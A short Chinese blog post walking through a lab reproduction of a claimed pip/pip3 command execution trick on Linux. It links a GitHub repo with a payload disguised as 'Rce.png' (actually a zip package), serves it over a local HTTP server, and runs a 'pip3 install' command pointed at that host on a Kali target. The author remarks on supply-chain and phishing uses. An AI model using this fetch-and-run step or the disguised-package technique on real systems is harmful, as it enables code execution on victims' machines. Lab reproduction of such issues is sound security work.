Linux系统下,pip/pip3的本地命令执行漏洞复现

其实说实话,这个洞是有争议的,不过竟然有效果,那咱们就复现一波。

首先脚本地址是在github的
地址: https://github.com/52piaoyu/linux-pip-rce

下载之后是主机文件其实是Rce.png,而后将格式更改成zip文件,可以看到其实文件的主体就是如下的
在这里插入图片描述

很简单很明了,干干净净~

好了,步入正题。

我们本地复现,本地利用python3环境开始临时的http环境

python -m http.server

在这里插入图片描述

而后靶机环境是kali哈

pip3 install "http://192"."168"."xx"."xxx:8000/Rce.png"

在这里插入图片描述

就这样,就可以了,点到即止​

怎么说呢,可以,但是没必要,因为这个洞只能本地利用,其次就是用于供应链、社工钓鱼还行,但是我想这个Poc…应该也许可能没人点吧。。。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值